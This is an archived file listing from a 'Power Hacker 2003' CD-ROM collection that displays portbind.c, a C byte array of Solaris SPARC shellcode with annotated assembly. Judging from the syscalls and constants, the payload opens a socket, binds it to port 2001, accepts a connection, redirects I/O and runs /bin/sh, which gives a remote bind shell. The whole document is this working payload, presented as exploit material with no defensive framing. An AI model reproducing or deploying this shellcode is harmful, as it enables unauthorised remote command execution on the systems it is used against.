home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / solaris-sparc / portbind.c < prev   
Encoding:
Text File  |  2000-10-21  |  2.9 KB  |  69 lines
  1. /*
  2.  
  3.   Solaris - Sparc -> www.dopesquad.net
  4.  
  5. */
  6.  
  7. char shellcode[] =
  8.   "\xa0\x23\xa0\x10"    /* sub        %sp, 16, %l0 */
  9.   "\xae\x23\x80\x10"    /* sub        %sp, %l0, %l7 */
  10.   "\xee\x23\xbf\xec"    /* st         %l7, [%sp - 20] */
  11.   "\x82\x05\xe0\xd6"    /* add        %l7, 214, %g1 */
  12.   "\x90\x25\xe0\x0e"    /* sub        %l7, 14, %o0 */
  13.   "\x92\x25\xe0\x0e"    /* sub        %l7, 14, %o1 */
  14.   "\x94\x1c\x40\x11"    /* xor        %l1, %l1, %o2 */
  15.   "\x96\x1c\x40\x11"    /* xor        %l1, %l1, %o3 */
  16.   "\x98\x25\xe0\x0f"    /* sub        %l7, 15, %o4 */
  17.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  18.   "\xa4\x1a\x80\x08"    /* xor        %o2, %o0, %l2 */
  19.   "\xd2\x33\xbf\xf0"    /* sth        %o1, [%sp - 16] */
  20.   "\xac\x10\x27\xd1"    /* mov        2001, %l6 */
  21.   "\xec\x33\xbf\xf2"    /* sth        %l6, [%sp - 14] */
  22.   "\xc0\x23\xbf\xf4"    /* st         %g0, [%sp - 12] */
  23.   "\x82\x05\xe0\xd8"    /* add        %l7, 216, %g1 */
  24.   "\x90\x1a\xc0\x12"    /* xor        %o3, %l2, %o0 */
  25.   "\x92\x1a\xc0\x10"    /* xor        %o3, %l0, %o1 */
  26.   "\x94\x1a\xc0\x17"    /* xor        %o3, %l7, %o2 */
  27.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  28.   "\x82\x05\xe0\xd9"    /* add        %l7, 217, %g1 */
  29.   "\x90\x1a\xc0\x12"    /* xor        %o3, %l2, %o0 */
  30.   "\x92\x25\xe0\x0b"    /* sub        %l7, 11, %o1 */
  31.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  32.   "\x82\x05\xe0\xda"    /* add        %l7, 218, %g1 */
  33.   "\x90\x1a\xc0\x12"    /* xor        %o3, %l2, %o0 */
  34.   "\x92\x1a\xc0\x10"    /* xor        %o3, %l0, %o1 */
  35.   "\x94\x23\xa0\x14"    /* sub        %sp, 20, %o2 */
  36.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  37.   "\xa6\x1a\xc0\x08"    /* xor        %o3, %o0, %l3 */
  38.   "\x82\x05\xe0\x2e"    /* add        %l7, 46, %g1 */
  39.   "\x90\x1a\xc0\x13"    /* xor        %o3, %l3, %o0 */
  40.   "\x92\x25\xe0\x07"    /* sub        %l7, 7, %o1 */
  41.   "\x94\x1b\x80\x0e"    /* xor        %sp, %sp, %o2 */
  42.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  43.   "\x90\x1a\xc0\x13"    /* xor        %o3, %l3, %o0 */
  44.   "\x92\x25\xe0\x07"    /* sub        %l7, 7, %o1 */
  45.   "\x94\x02\xe0\x01"    /* add        %o3, 1, %o2 */
  46.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  47.   "\x90\x1a\xc0\x13"    /* xor        %o3, %l3, %o0 */
  48.   "\x92\x25\xe0\x07"    /* sub        %l7, 7, %o1 */
  49.   "\x94\x02\xe0\x02"    /* add        %o3, 2, %o2 */
  50.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  51.   "\x90\x1b\x80\x0e"    /* xor        %sp, %sp, %o0 */
  52.   "\x82\x02\xe0\x17"    /* add        %o3, 23, %g1 */
  53.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  54.   "\x21\x0b\xd8\x9a"    /* sethi      %hi(0x2f626800), %l0 */
  55.   "\xa0\x14\x21\x6e"    /* or         %l0, 0x16e, %l0    ! 0x2f62696e */
  56.   "\x23\x0b\xdc\xda"    /* sethi      %hi(0x2f736800), %l1 */
  57.   "\x90\x23\xa0\x10"    /* sub        %sp, 16, %o0 */
  58.   "\x92\x23\xa0\x08"    /* sub        %sp, 8, %o1 */
  59.   "\x94\x1b\x80\x0e"    /* xor        %sp, %sp, %o2 */
  60.   "\xe0\x3b\xbf\xf0"    /* std        %l0, [%sp - 16] */
  61.   "\xd0\x23\xbf\xf8"    /* st         %o0, [%sp - 8] */
  62.   "\xc0\x23\xbf\xfc"    /* st         %g0, [%sp - 4] */
  63.   "\x82\x02\xe0\x3b"    /* add        %o3, 59, %g1 */
  64.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  65.   "\x90\x1b\x80\x0e"    /* xor        %sp, %sp, %o0 */
  66.   "\x82\x02\xe0\x01"    /* add        %o3, 1, %g1 */
  67.   "\x91\xd0\x38\x08"    /* ta         0x8 */
  68. ;
  69.